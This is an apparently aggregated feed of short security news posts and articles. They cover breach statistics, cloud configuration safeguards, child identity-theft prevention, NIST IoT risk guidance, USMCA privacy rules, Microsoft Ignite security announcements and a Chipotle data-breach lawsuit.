The Trump administration's shift to an offensive approach is designed to escalate cyber conflicts, and that escalation could be dangerous. Not only will it detract resources and attention from the more pressing issues of defense and risk management, but it will also encourage the government to act recklessly in directing cyberattacks at targets before they can be certain of who those targets are and what they are doing.

[...]

There is no evidence that pre-emptive cyberattacks will serve as effective deterrents to our adversaries in cyberspace. In fact, every time a country has initiated an unprompted cyberattack, it has invariably led to more conflict and has encouraged retaliatory breaches rather than deterring them. Nearly every major publicly known online intrusion that Russia or North Korea has perpetrated against the United States has had significant and unpleasant consequences.

Wolff is right; this is reckless. In Click Here to Kill Everybody, I argue for a "defense dominant" strategy: that while offense is essential for defense, when the two are in conflict, it should take a back seat to defense. It's more complicated than that, of course, and I devote a whole chapter to its implications. But as computers and the Internet become more critical to our lives and society, keeping them secure becomes more important than using them to attack others.

Four critical KPIs for securing your IT environment

In 2018, the average cost of a data breach is more than $3.75 million, and experts expect this number to rise in the coming years. This staggering—and potentially catastrophic—cost per incident is why implementing proper security practices is so important, so it is vital that enterprises both large and small understand how to secure their IT environments successfully. So, what should you be measuring when it comes to your security program? As the old saying … More

The post Four critical KPIs for securing your IT environment appeared first on Help Net Security.

945 data breaches led to compromise of 4.5 billion data records in first half of 2018

Gemalto released the latest findings of the Breach Level Index, a global database of public data breaches, revealing 945 data breaches led to 4.5 billion data records being compromised worldwide in the first half of 2018. Compared to the same period in 2017, the number of lost, stolen or compromised records increased by a staggering 133 percent, though the total number of breaches slightly decreased over the same period, signaling an increase in the severity … More

The post 945 data breaches led to compromise of 4.5 billion data records in first half of 2018 appeared first on Help Net Security.

Mobile security threats: Lack of visibility is putting businesses at risk

A significant lack of visibility into devices and networks is putting businesses at risk for data leakage and phishing attacks, according to a study conducted by Enterprise Mobility Exchange. The study showed that nearly 50 percent of mobile workers spend the majority of their worktime connected to non-corporate public Wi-Fi and carrier networks. Of that 50 percent, over 27 percent claim to connect to non-corporate owned networks more than 76 percent of the time. And, … More

The post Mobile security threats: Lack of visibility is putting businesses at risk appeared first on Help Net Security.

Health websites routinely share your activity with 57 third-parties

B9 Systems conducted research into the use of cookies by health websites and discovered that all the major players share your private information with, on average, 57 other websites. These include advertising & marketing websites, social media outlets and resellers. For many with a health problem, the first port of call is a quick online search in hope of self-diagnosis. Research has revealed that your activity doesn’t always stay with the website you visited. “It’s … More

The post Health websites routinely share your activity with 57 third-parties appeared first on Help Net Security.

Keeping your cloud malware-free: What you need to know

This year we’ve seen massive malware attacks spanning from nation state campaigns originating in North Korea and Russia to popular restaurants and everything in between. Each new incident serves as a grim reminder to business leaders that hackers will not relent. Yet with cloud adoption growing rapidly in the enterprise, the odds of a malware infection spreading and leading to a potential breach are increasing. According to a study conducted by the Ponemon Institute, almost … More

The post Keeping your cloud malware-free: What you need to know appeared first on Help Net Security.

DevOps and digital transformation initiatives are creating insecure apps

WhiteHat Security released its 2018 Application Security Statistics Report, “The Evolution of the Secure Software Lifecycle,” which identifies the security vulnerabilities and challenges introduced into the enterprise through traditional applications, and through agile development frameworks, microservices, APIs, and cloud architectures. One of the greatest concerns is that with few exceptions, the number of serious vulnerabilities per site has increased across all major industries, despite some improvements in finance, healthcare and retail. Unfortunately, these verticals are … More

The post DevOps and digital transformation initiatives are creating insecure apps appeared first on Help Net Security.

Global spending on security solutions to reach $133.7 billion in 2022

Worldwide spending on security-related hardware, software, and services is forecast to reach $133.7 billion in 2022, according to IDC. Although spending growth is expected to gradually slow over the 2017-2022 forecast period, the market will still deliver a compound annual growth rate (CAGR) of 9.9%. As a result, security spending in 2022 will be 45% greater than the $92.1 billion forecast for 2018. “Privacy has grabbed the attention of Boards of Directors as regions look … More

The post Global spending on security solutions to reach $133.7 billion in 2022 appeared first on Help Net Security.

Read: How To Build Resilient Cloud Configuration Shields

Configurable systems have a high level of flexibility and are better adapted to most customer needs, but their management isn’t a trivial task in complex cloud deployments.

The configuration management concept isn’t new and originated in the United States Department of Defense in the 1950s as a technical management discipline for hardware material items. In a software environment, it has a different meaning, but the concept remains the same.

Let’s take a closer look at why it’s so important in our system and how we handle it.

The Dilemma

Administrators, support engineers or any other people who deal with services or products, like configuration. Product or service parameterization allows adjustment to customer needs exactly as the customer requires. This can be done by a small modification of default configuration or by enabling/disabling a feature. Of course, the default settings should be simple and meet the need in most cases, but they do not fit all of them.

As developers we hate configuration, it makes for messy code. Configuration creates complexity, and any parameter in it or its change adds additional testing. Since developers don’t rule the world, however, we need to make do. On the other hand, we are responsible for providing a stable and reliable service, so how do we find a happy medium?

The simple answer to that would be “more unit-testing” or “more testing” to account for all possible scenarios, right? Well, some managers would agree, but the real world is a little bit more complicated than a Q/A lab. Our R&D and test automation teams are already doing a great job, but it’s not always enough since there are practically infinite combinations of configurations, and testing alone cannot mitigate the risk.

We know that configuration validation should be done in a real-time environment, so the Imperva Incapsula engineering team created a few mechanisms for self-protection. These mechanisms ensure close to zero impact for our customers in production, by checking correctness and fast recovery in the face of errors.

In this post, we’ll describe a few of those mechanisms, some basic, like schema validation, others more complicated, like configuration snapshot management.

Let’s kick it off with a simple configuration flow.

Configuration Flow

Customer configuration is transferred from one agent to another by employing what we refer to as a “shield”. In each case, every agent ensures the configuration is correct. We do this to achieve two goals:

  1. Catch the problem as fast as possible, because early detection is crucial for a timely resolution
  2. Some shields have overlapping protection for better detection

Let’s take a closer look at these shields. Every configuration asset is protected by several shields as described in the following illustration but not necessarily by all of them. Each shield is described below.

Management Console Configuration Shield

The Imperva Incapsula Management Console is used by both customers and operations staff. Its job is to receive configuration changes via the user interface or API, store it in the configuration database and notify the next agent that a configuration change has occurred.

The Management Console performs the following validations:

  • Schema correctness – configuration structure is correct for both database storage and runtime components. For example, data types validation.
  • Semantic correctness – any changed or added configuration is validated under its scope. For example, model state changes.
  • Data relationships – data should be correct relative to another component in the system. For example, customer site name or GRE tunnel IPs.

Once the problem is detected, the user is immediately notified and the configuration update is rejected.

Configuration Sandbox Shield

In addition to performing static validations, Imperva Incapsula also sandboxes configuration changes in a live system before propagating it to the production network. The goal of this step is to detect unexpected issues with the configuration.

The configuration is loaded into fully operational runtime nodes, which try to detect the problem, anomaly or incorrect behavior. Note that the runtime nodes do not serve customer traffic. In the unlikely event that a configuration error is detected, the configuration change is isolated and will not affect customer traffic.

As described in illustration, at this point, valid configuration changes reach production nodes and affect customer traffic. However, issues that result originate from unexpected traffic patterns can still show up. So, an additional shield is required to ensure that such issues are handled gracefully.

Runtime Node Configuration Shield

Runtime nodes implement the last protection point which allows them to recover from bad configuration changes, even ones that cause the process to abruptly terminate (crash). The mechanism keeps a Last Known Good (LKG) snapshot of the configuration repository and is able to revert to it when needed. As opposed to previous shields, this one operates at the repository level. We chose that design because it might be very complicated to discover a single bad configuration change and we want to recover as quick as possible.

This shield’s implementation covers the following stages:

  • Background – the system maintains snapshots of LKG repositories
  • Detection – the system detects issues with the repository
  • Decision – the system decides whether a repository is safe to use or not
  • Rollback – the system reverts to an LKG repository
  • Recovery – once the configuration is fixed, the system recovers to the most recent version of the repository

This shield is our last line of defense, and we do not expect it to take action on a daily basis. However, if that occurs, our monitoring systems notify the relevant teams to immediately investigate and find the root cause of the issue, as described in our post: How to Tame “Monitorture” and Build a Developer-Friendly Monitoring Environment.

Runtime Node Configuration Shield Implementation

In this last section, I’d like to share some details about how we implemented the runtime node configuration shield.

We keep the configuration in files, so we wanted to find a solution at the file-system level. We evaluated several options for file-system snapshot management and decided to go with Btrfs storage, which is based on the copy-on-write (COW) principle. Btrfs has built-in snapshot functionality and meets our performance requirements.

Over Btrfs, we implemented a small open-source component, which is run as a service and creates snapshots for different repositories defined in our system. This component is generic and can be used by any product to achieve the same goal.

The following configuration is an example of possible repositories:

Configuration example of this service[/caption]

Repository represents the Btrfs device managed by snapper, while snapshot_level represents snapshot frequency and links to the latest snapshot taken under this snapshot level. Each repository can define several snapshot levels based on business logic or frequency of configuration changes.

The snapper creates a snapshot periodically based on configuration but stops if any defined “stoppers” exists.

Runtime components use master configuration until the configuration problem is detected. Once detected, the component tries to load the latest good snapshot configuration with links defined in the configuration. In addition, the stopper should be created or ordered to stop snapper functionality.

We believe that similar techniques can be used in any cloud service. These mechanisms help us provide a reliable service and we strive for a reality in which they will not be activated. But if they are, our customers can rest easy.

#CyberAware: Teaching Kids to Get Fierce About Protecting Their Identity

Identity ProtectionIt wasn’t Kiley’s fault, but that didn’t change the facts: The lending group denied her college loan due to poor credit, and she didn’t have a plan B. Shocked and numb, she began to dig a little deeper. She discovered that someone had racked up three hefty credit card bills using her Social Security Number (SSN) a few years earlier.

Her parents had a medical crisis and were unable to help with tuition, and Kiley’s scholarships didn’t cover the full tuition. With just months left before leaving to begin her freshman year at school, Kiley was forced to radically adjusted her plans. She enrolled in the community college near home and spent her freshman year learning more than she ever imagined about identity protection and theft.

The Toll: Financial & Emotional

Unfortunately, these horror stories of childhood identity theft are all too real. According to Javelin Strategy & Research, more than 1 million children were the victim of identity fraud in 2017, resulting in losses of $2.6 billion and more than $540 million in out-of-pocket costs to the families.

The financial numbers don’t begin to reflect the emotional cost victims of identity theft often feel. According to the 2017 Identity Theft Aftermath report released by the Identity Theft Resource Center, victims report feeling rage, severe distress, angry, frustrated, paranoid, vulnerable, fearful, and — in 7% of the cases — even suicidal.

Wanted: Your Child’s SSNIdentity Protection

Sadly, because of their clean credit history, cyber crooks love to target kids. Also, identity theft among kids often goes undiscovered for more extended periods of time. Thieves have been known to use a child’s identity to apply for government benefits, open bank or credit card accounts, apply for a loan or utility service, or rent a place to live. Often, until the child grows up and applies for a car or student loan, the theft goes undetected.

Where do hackers get the SSN’s? Data breaches can occur at schools, pediatrician offices, banks, and home robberies. A growing area of concern involves medical identity theft, which gives thieves the ability to access prescription drugs and even expensive medical treatments using someone else’s identity.

6 Ways to Build #CyberAware Kids

  1. Talk, act, repeat. Identity theft isn’t a big deal until it personally affects you or your family only, then, it’s too late. Discuss identity theft with your kids and the fallout. But don’t just talk — put protections in place. Remind your child (again) to keep personal information private. (Yes, this habit includes keeping passwords and personal data private even from BFFs!)
  2.  Encourage kids to be digitally savvy. Help your child understand the tricks hackers play to steal the identities of innocent people. Identity thieves will befriend children online and with the goal of gathering personal that information to steal their identity. Thieves are skilled at trolling social networks looking at user profiles for birth dates, addresses, and names of family members to piece together the identity puzzle. Challenge your kids to be on the hunt for imposters and catfishes. Teach them to be suspicious about links, emails, texts, pop up screens, and direct messages from “cute” but unknown peers on their social media accounts. Teach them to go with their instincts and examine websites, social accounts, and special shopping offers.Identity Protection
  3. Get fierce about data protection. Don’t be quick to share your child’s SSN or secondary information such as date of birth, address, and mothers’ maiden name and teach your kids to do the same. Also, never carry your child’s (or your) physical Social Security card in your wallet or purse. Keep it in a safe place, preferably under lock and key. Only share your child’s data when necessary (school registration, passport application, education savings plan, etc.) and only with trusted individuals.
  4. File a proactive fraud alert. By submitting a fraud alert in your child’s name with the credit bureaus several times a year, you will be able to catch any credit fraud early. Since your child hasn’t built any credit, anything that comes back will be illegal activity. The fraud alert will remain in place for only 90 days. When the time runs out, you’ll need to reactivate the alert. You can achieve the same thing by filing an earnings report from the Social Security Administration. The report will reveal any earnings acquired under your child’s social security number.
  5. Know the warning signs. If a someone is using your child’s data, you may notice: 1) Pre-approved credit card offers addressed to them arriving via mail 2) Collection agencies calling and asking to speak to your child 3) Court notices regarding delinquent bills. If any of these things happen your first step is to call and freeze their credit with the three credit reporting agencies: Equifax, Experian, and TransUnion.
  6. Report theft. If you find a violation of your child’s credit of any kind go to  IdentityTheft.gov to report the crime and begin the restoring your child’s credit. This site is easy to navigate and takes you step-by-step down the path of restoring stolen credit.

Building digitally resilient kids is one of the primary tasks of parents today. Part of that resilience is taking the time to talk about this new, digital frontier that is powerful but has a lot of security cracks in it that can negatively impact your family. Getting fierce about identity protection can save your child (and you) hours and even years of heartache and financial loss.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post #CyberAware: Teaching Kids to Get Fierce About Protecting Their Identity appeared first on McAfee Blogs.

BEC-as-a-Service: Hacked accounts available from $150

Digital Shadows has announced the findings of new research revealing the diversity of methods used to infiltrate company emails. The FBI has estimated that scams resulting from business email compromise – such as fake invoices and wire fraud – have cost businesses $12bn globally over the last five years. Email inboxes exposed While phishing is a common means of attack, the research reveals criminals are resorting to a wide variety of methods to access business … More

The post BEC-as-a-Service: Hacked accounts available from $150 appeared first on Help Net Security.

Most enterprises highly vulnerable to security events caused by cloud misconfiguration

Fugue released the results of its Cloud Infrastructure Misconfiguration Report. The survey of more than 300 IT professionals revealed that most enterprises are highly vulnerable to security events caused by cloud misconfiguration. Critical data breaches and system downtime events were among the many reported negative outcomes of misconfiguration. Misconfiguration can occur for a variety of reasons The key finding: while 92 percent of IT and security professionals reported concerns about security risks due to misconfiguration, … More

The post Most enterprises highly vulnerable to security events caused by cloud misconfiguration appeared first on Help Net Security.

Can we trust digital forensic evidence?

Research carried out at the University of York has suggested that more work is needed to show that digital forensic methods are robust enough to stand-up to interrogation in a court of law. Digital forensics is the recovery and investigation of digital devices and digital materials, often related to serious crimes, such as terrorism and murder, but also more localised issues within the workplace such as employee misconduct and cyber bullying. New research at the … More

The post Can we trust digital forensic evidence? appeared first on Help Net Security.

NIST Seeks Public Comment on Managing Internet of Things Cybersecurity and Privacy Risks

The U.S. Department of Commerce’s National Institute of Standards and Technology recently announced that it is seeking public comment on Draft NISTIR 8228, Considerations for Managing Internet of Things (“IoT”) Cybersecurity and Privacy Risks (the “Draft Report”). The document is to be the first in a planned series of publications that will examine specific aspects of the IoT topic.

The Draft Report is designed “to help federal agencies and other organizations better understand and manage the cybersecurity and privacy risks associated with their IoT devices throughout their lifecycles.” According to the Draft Report, “[m]any organizations are not necessarily aware they are using a large number of IoT devices. It is important that organizations understand their use of IoT because many IoT devices affect cybersecurity and privacy risks differently than conventional IT devices do.”

The Draft Report identifies three high-level considerations with respect to the management of cybersecurity and privacy risks for IoT devices as compared to conventional IT devises: (1) many IoT devices interact with the physical world in ways conventional IT devices usually do not; (2) many IoT devices cannot be accessed, managed or monitored in the same ways conventional IT devices can; and (3) the availability, efficiency and effectiveness of cybersecurity and privacy capabilities are often different for IoT devices than conventional IT devices. The Draft Report also identifies three high-level risk mitigation goals: (1) protect device security; (2) protect data security; and (3) protect individuals’ privacy.

In order to address those considerations and risk mitigation goals, the Draft Report provides the following recommendations:

  • Understand the IoT device risk considerations and the challenges they may cause to mitigating cybersecurity and privacy risks for devices in the appropriate risk mitigation areas.
  • Adjust organizational policies and processes to address the cybersecurity and privacy risk mitigation challenges throughout the IoT device lifecycle.
  • Implement updated mitigation practices for the organization’s IoT devices as you would any other changes to practices.

Comments are due by October 24, 2018.

How Nick Bradley Made a Career of Pursuing Bad Guys, From the Military to X-Force IRIS

These days, Nick Bradley is policing the world of cyberthreats in his role as practice lead of the IBM X-Force Incident Response and Intelligence Services (IRIS) Threat Analysis Group — but that wasn’t always the plan.

Nick comes from a multigenerational military family — his daughters are currently about to enter the service. Growing up in “middle of nowhere Florida,” there weren’t many options for Nick; he could either follow his family into the military or go to work at the local federal prison as a correctional officer. He pursued the best of both worlds by entering active duty with the Army military police, working his way to sergeant and switching to Reserves so he could study and become an officer, all the while maintaining a private hobby building computers and gaming.

One day, Nick came into work at the dispatch desk to find the computer switched off; it had a virus, the desk sergeant said, and they needed to wait for IT to come and fix it tomorrow.

“So I cleaned it up because I knew how to,” remembers Nick. “And it was something simple, too — it wasn’t some bleeding edge virus, it was one that had been out there forever. Back then, people had viruses on machines all the time. So I cleaned that up and went to work, didn’t think anything more of it.

“Then the next morning when all of the brass came in, I got called into the sergeant major’s office, and he wanted to know how I knew how to fix that computer.”

Changing Careers Under Orders

Nick’s personal tech interests ended up causing a major turn in his career. The brass told him he had a new job as a system administrator in the provost marshal’s office, and the rest is history.

“The thing was, in my mind, I still wanted to be military police, and so I was just doing this because that’s what they ordered me to do,” he says. “I even got accepted into the SWAT, or what the Army calls the SRT, and I did that on weekends so I could still be a cop.”

Nick later went to the Army Reserve and joined the Army R.O.T.C. program with the goal of becoming a commissioned officer. During that time, he also picked up some contract IT work to help pay the bills. Ultimately, it was this part-time job that led to a full-time career with Internet Security Systems — later acquired by IBM — and Nick decided not to commission back into active duty.

“It was an extremely hard decision because I love the military, but I realized I was going to be able to make a difference in this field that I never even knew existed, and that I was going to be able to provide a better life for my wife and kids.”

These days, Nick is still patrolling and protecting — he’s just a bit more desk-bound than he was while on active duty. Running the threat analysis group inside X-Force IRIS means Nick is in charge of the team that scours the net for signs of threats, turning it all into actionable intelligence not just for IBM clients, but for the world at large.

Quick to point out their role within a larger team — and that a lot of other groups contribute to the threat analysis — Nick explains how he and his X-Force IRIS colleagues identify issues. Using proprietary tools, the team scrapes the internet for text featuring keywords and information they find important: security patches being released, vulnerabilities exposed, breach disclosures and other info. They also have other groups within IBM they use as trusted sources, such as the incident response side of X-Force IRIS and IBM Trusteer, as well as external companies including Cisco Talos, Palo Alto Networks, Trend Micro and others.

Nick Bradley of IBM X-Force IRIS

Actionable Security Intelligence Beats the Bad Guys

“Our primary goal is to parse through all that noise and sort out what is hot versus what is just hype,” Nick says, explaining that the important information is made available through the team’s daily newsletter and through X-Force Exchange Collections.

“We don’t just want to be the person running around screaming ‘the sky is falling’ — we want to be the one telling you here’s where you go so you don’t get hurt. So we are always trying to share not just the intel, but also some form of action that can be taken, or actionable intelligence. That ranges from mitigation recommendations to actual indicators of compromise, what’s called IoC, and those can usually be directly loaded into protection platforms or into SIEMs.”

After nearly two decades watching threats and developing mitigations, Nick says the biggest thing that’s changed in cybersecurity is that the world now (finally!) takes it seriously. It used to be difficult to get a company to spend money on security; once they started seeing competitors suffer financial and reputational damage, though, that all changed.

But if the good news is that everyone has become more security-savvy, flip side is that the “bad guys are getting more sophisticated as well,” Nick says. Plus, there’s now there’s a “trickle-down” effect where high-level threat actors and advanced persistent threat (APT) groups release their tools onto the web, and lesser groups then access them to wreak their own havoc.

“One thing I think has significantly changed is the idea of hacking for infamy and glory,” says Nick. “For the longest time it was about compromising somebody and defacing their website — ‘you’ve been hacked, haha.’ It still happens, but that’s not the focus anymore. The focus now is espionage; it’s about money, sabotage, political agendas.”

All that must be hard for a guy from a law enforcement background. Nick says it was difficult at first to get used to mitigating, defending and protecting instead of directly going after the bad guys.

“That is a stark difference,” he says, “but I still think you make a better impact with protecting and defending than you would trying to go after individuals. We leave that to the FBI.”

Meet Fraud Analyst Shir Levin

The post How Nick Bradley Made a Career of Pursuing Bad Guys, From the Military to X-Force IRIS appeared first on Security Intelligence.

APTs are targeting IT service providers

Managed service providers (MSPs) and cloud service providers (CSPs) are under attack by advanced persistent threat (APT) groups, the U.S. Department of Homeland Security warns. “MSPs provide remote management of customer IT and end-user systems. MSPs generally have direct and unfettered access to their customers’ networks, and may store customer data on their own internal infrastructure. However, a compromise in one part of an MSP’s network can spread globally, affecting other customers and introducing risk,” … More

The post APTs are targeting IT service providers appeared first on Help Net Security.

Bridging the priority gap between IT and security in DevOps

Let’s start with a test. Suppose that you manage a corporate network gateway across which a critical programmed transaction is scheduled to occur in exactly one hour. Suppose further that the firewall protecting this gateway is functionally misbehaving and will almost certainly block any programmed activity with your transaction partner. This is a serious concern because your boss has reinforced to you several times the importance of this planned transaction. Your team continues to work … More

The post Bridging the priority gap between IT and security in DevOps appeared first on Help Net Security.

Most organizations believe hackers can penetrate their network

Radware released findings from its second annual web application security report, Radware 2018 State of Web Application Security. The report shares an in-depth view of the challenges organizations face in protecting web applications and how recent security breaches have affected them in the past year. In fact, it revealed that 67% of organizations believe hackers can still penetrate their network. The research focused on global companies and showed a growing frequency and complexity of application-layer … More

The post Most organizations believe hackers can penetrate their network appeared first on Help Net Security.

For some cloud services more than 75% of accounts are utilized by hackers

Researchers found that 21.57% percent of accounts originating from cloud service IP ranges appear to be fraudulent. Malicious accounts are eight times more likely to originate via cloud services than normal users. In fact, some cloud services and data centers can have more than 75% fraudulent accounts. The Q2 2018 DataVisor Fraud Index Report is a quarterly assessment of types and methods of online fraud in social platforms and financial services. The current report uses … More

The post For some cloud services more than 75% of accounts are utilized by hackers appeared first on Help Net Security.

The ultimate fallout from the Facebook data breach could be massive

Less than a week ago, Facebook announced that unknown attackers have managed to string together three bugs affecting the social media platform, which allowed them to steal access tokens of at least 50 million users – and likely more. The tokens allowed the attackers to take over victims’ Facebook accounts but could also have been used to log into accounts the victims opened on other websites and apps by using Facebook Login (i.e. using Facebook … More

The post The ultimate fallout from the Facebook data breach could be massive appeared first on Help Net Security.

APEC Cross-Border Privacy Rules Enshrined in U.S.-Mexico-Canada Trade Agreement

On September 30, 2018, the U.S., Mexico and Canada announced a new trade agreement (the “USMCA”) aimed at replacing the North American Free Trade Agreement. Notably, the USMCA’s chapter on digital trade recognizes “the economic and social benefits of protecting the personal information of users of digital trade” and will require the U.S., Canada and Mexico (the “Parties”) to each “adopt or maintain a legal framework that provides for the protection of the personal information of the users[.]” The frameworks should include key principles such as: limitations on collection, choice, data quality, purpose specification, use limitation, security safeguards, transparency, individual participation and accountability.

In adopting such a framework, Article 19.8(2) directs the Parties to consider the principles and guidelines of relevant international bodies, such as the APEC Privacy Framework and the OECD Recommendation of the Council concerning Guidelines Governing the Protection of Privacy and Transborder Flows of Personal Data, and Article 19.8(6) formally recognizes the APEC Cross-Border Privacy Rules (the “APEC CBPRs”) within their respective legal systems:

Art. 19.8(6) Recognizing that the Parties may take different legal approaches to protecting personal information, each Party should encourage the development of mechanisms to promote compatibility between these different regimes. The Parties shall endeavor to exchange information on the mechanisms applied in their jurisdictions and explore ways to extend these or other suitable arrangements to promote compatibility between them. The Parties recognize that the APEC Cross-Border Privacy Rules system is a valid mechanism to facilitate cross-border information transfers while protecting personal information.

In addition, Article 19.14(1)(b) provides that “the Parties shall endeavor to… cooperate and maintain a dialogue on the promotion and development of mechanisms, including the APEC Cross-Border Privacy Rules, that further global interoperability of privacy regimes.”

The APEC CBPRs were developed by the 21 APEC member economies as a cross-border transfer mechanism and comprehensive privacy program for private sector organizations  to enable the accountable free flow of data across the APEC region. Organizations must be certified by a third-party APEC recognized Accountability Agent to participate in this system. The CBPRs are binding and enforceable against participating companies.

The USMCA must still pass the U.S. Congress, the Canadian Parliament, and the Mexican Senate.

You gotta fight, for your right, to erasure

According to Article 17 of the European Union’s General Data Protection Regulation (GDPR), all personal data that is no longer necessary must be removed and deleted. This aspect of the law, also known as “the right to erasure,” grants any user or customer the right to request that an organization deletes all data related or associated to them without undue delay, within 30 days. Moreover, the regulation carries heavy fines if a business does not … More

The post You gotta fight, for your right, to erasure appeared first on Help Net Security.

Latest Building Security In Maturity Model reflects software security initiatives of 120 firms

Synopsys released BSIMM9, the latest version of the Building Security In Maturity Model (BSIMM) designed to help organizations plan, execute, and measure their software security initiatives (SSIs). The ninth iteration of BSIMM reflects data collected over a 10-year study of real-world SSIs across 120 firms. “Development, security, and operations teams need to align, and BSIMM9 provides data suggesting this is taking place through automation, particularly as software shifts to the cloud,” said Dr. Brian Chess, … More

The post Latest Building Security In Maturity Model reflects software security initiatives of 120 firms appeared first on Help Net Security.

In terms of main threat actors, expectation rarely matches reality

Netwrix conducted a study of the major IT risks that are significant for most organizations and assessed respondents’ readiness to withstand cyber threats. The report is based on the feedback of 1,558 organizations of various sizes from many different regions and industries. It summarizes the experiences and plans the organizations have in regard to addressing six IT risks: physical damage, intellectual property theft, data loss, data breach, system disruption and compliance penalties. The report reveals … More

The post In terms of main threat actors, expectation rarely matches reality appeared first on Help Net Security.

Crypto-Security Testnet Surpasses Key Milestones

Security and has been combined with micro-compucomputing are a combination which ascended to greatly relevant, both economically and financially, since the early days of commercial internet technology, the John McAfee associated era of anti-virus software, and fears of ‘millennium-bug’ (‘Y2K’)-induced societal meltdowns. As a market player, ‘cybersecurity‘ is hailed for its continuedvalue and growth, with […]

The post Crypto-Security Testnet Surpasses Key Milestones appeared first on Hacked: Hacking Finance.

Google Announces 5 Major Security Updates for Chrome Extensions

Google has made several new announcements for its Chrome Web Store that aims at making Chrome extensions more secure and transparent to its users. Over a couple of years, we have seen a significant rise in malicious extensions that appear to offer useful functionalities, while running hidden malicious scripts in the background without the user's knowledge. However, the best part is that

Ignite 2018 highlights: passwordless sign-in, confidential computing, new threat protection, and more

What a week it was in Orlando! Ignite is always a biggie, and this one was no exception. For all of us here at Microsoft who get to work on security, spending time with customers to learn how you are using our security products today and to share new innovations to come is a highlight. At this year’s event we put even greater emphasis on providing attendees with access to engineering experts throughout more than one hundred focused sessions, workshops, and hands-on immersion experiences for the latest technologies in security. I was chuffed to see that our security booths at the center of the expo hall were chock-a-block for the whole event. Thank you to everyone who stopped by, attended our social and community events, and connected with our engineers and product managers.

After their security blanket work at the RSA Conference earlier this year, our social team once again took a shot at peak swag. Our Security SOCs were the result, lovingly designed and then crafted from the finest combed cotton, bringing fashion together with a six-month Enterprise Mobility + Security trialquite the combination.

Show us your own fashion moment through social media with #askmeaboutmySOC #showmeyourSOC.

More seriously, if you weren’t able to join us this year, or found yourself trading off between sessions or workshops at the show, don’t worry, our breakout sessions on security are available on-demand. At Ignite 2018, we also brought a deep lineup of new security innovations that I have summarized below, along with some top session recommendations:

Identity and access management

We really dont like passwords, so together we want to help you eliminate their use through simpler, more secure alternatives. New support for passwordless sign-in to Azure Active Directory (Azure AD) connected appsboth cloud and on-premisesthrough the Microsoft Authenticator app can help you replace passwords with a more secure, multi-factor sign-in that can reduce compromise by 99.9 percent and significantly simplify the user experience. Watch the Ignite session: Getting to a world without passwords.

We also announced two powerful new features in our set of identity governance capabilities for Azure AD to help automate the process of granting access to employees and partners: Entitlement Management and My Access. Watch the Ignite session: Govern access to your resources with Azure AD identity governance. And read more about identity and access management announcements.

Information protection

As you move more of your workloads to the cloud, meeting information security and compliance standards needs a new approach. Azure is the first cloud platform to offer confidentiality and integrity of data while in useadding to the protections already in place that help keep your data secure in transit and at rest. Azure confidential computing benefits are available soon on a new DC series of virtual machines in Azure, enabling trusted execution environments using Intel SGX chipsets to protect data while its being computed. Watch the Ignite session: Protection by design: Intel SGX and Azure Confidential Computing.

Weve also rolled out a new unified labeling experience in the Security & Compliance Center in Microsoft 365 that delivers a single, integrated approach to creating data sensitivity and data retention labels. You can preview new labeling capabilities that are built into Office apps across all major platforms and new extensions of labeling and protection capabilities to include PDFs. The Microsoft Information Protection SDK, now generally available, enables other software creators to enhance and build applications that understand, apply, and act on Microsoft sensitivity labels so you can have more cohesive information protection. Read more about the information protection announcements and watch the Ignite session.

Threat protection

Microsoft Threat Protection, announced at Ignite last week, is an integrated experience for detection, investigation, and remediation across endpoints, email, documents, identity, and infrastructure. This new integration in the Microsoft 365 admin console combines signal across all of Office 365 Advanced Threat Protection (ATP), Windows Defender ATP, Microsoft Cloud App Security, Azure AD Identity Protection, and the Azure Security Center to help you secure across your digital estate. The portal not only provides alerts and monitoring of threats, but also gives you the ability to make real-time policy changes to help your security strategy stay ahead of changing threats. Read more about Microsoft Threat Protection or watch the Ignite session.

Microsoft Cloud App Security can now leverage the traffic information collected by Windows Defender Advanced Threat Protection about the cloud apps and services being accessed from IT-managed Windows 10. This native integration provides admins a more complete view of cloud usage in their organization and easier investigative work. Read more about this integration or watch the Ignite session.

Security management

To help you strengthen your security posture, youll want to understand your current position and where to go from there. Microsoft Secure Score is the only dynamic report card for cybersecurity. Organizations that use the Secure Score assessments and recommendations typically reduce their chance of a breach by 30-fold. Microsoft Secure Score provides guidance to improve your security posture. For example, Secure Score can recommend taking steps to secure your admin accounts with Multi-Factor Authentication (MFA), secure users accounts with MFA, and turn off client-side email forwarding rules. Starting today, were expanding Secure Score to cover all of Microsoft 365. We are also introducing Secure Score for hybrid cloud workloads in the Azure Security Center, so you can have full visibility across your organizations entire estate. Read more about Microsoft Secure Score or watch the Ignite session.

Unified endpoint management

Customers using System Center Configuration Manager and Microsoft Intune to manage their existing infrastructure benefit immediately from the scale, reliability, and security of the cloud. We announced new capabilities for unified endpoint management (UEM) at Ignite to empower IT to secure your data across a variety of devices and platforms, and to help you deliver intuitive and native user experiences for Windows 10, iOS, and Android devices. Read more about all the UEM advancements or watch the Ignite session.

Looking ahead

Working closely with customers is at the center of our ability to innovate and evolve our security technologies. Ignite is a top-notch opportunity to build security community. It doesnt stop there though. We are always interested in your feedback as we roll out new capabilitiesdo join us and have your voice heard via the Tech Community.

The post Ignite 2018 highlights: passwordless sign-in, confidential computing, new threat protection, and more appeared first on Microsoft Secure.

Chipotle Consumer Plaintiffs’ Putative Class Case Survives in Part

On September 26, 2018, the U.S. District Court for the District of Colorado (“the Court”) refused to dismiss all putative class claims against Chipotle Mexican Grill, Inc. (“Chipotle”). This litigation arose from a 2017 data breach in which hackers stole customers’ payment card and other personal information by using malicious software to access the point-of-sale systems at Chipotle’s locations. 

Chipotle moved to dismiss all claims, arguing that two of the named plaintiffs – Plaintiff Lawson and Plaintiff Baker – lacked standing and that all other plaintiffs failed to state a claim. The motion was first considered by a United States Magistrate Judge, who recommended granting only part of Chipotle’s requested relief. Both Plaintiffs and Chipotle objected to portions of the recommendation. The District Court Judge agreed with the recommendation in part.

The Court first found that Plaintiff Lawson’s allegations of debit card misuse, time spent obtaining a new debit card, inability to receive cash back awards on certain purchases, and the cost to expedite delivery of a new card for impending travel all demonstrated injury in fact sufficient for standing. It also determined that more than just Plaintiff Baker’s name and payment card number may have been stolen, thus alleging facts sufficient to establish an impending injury.

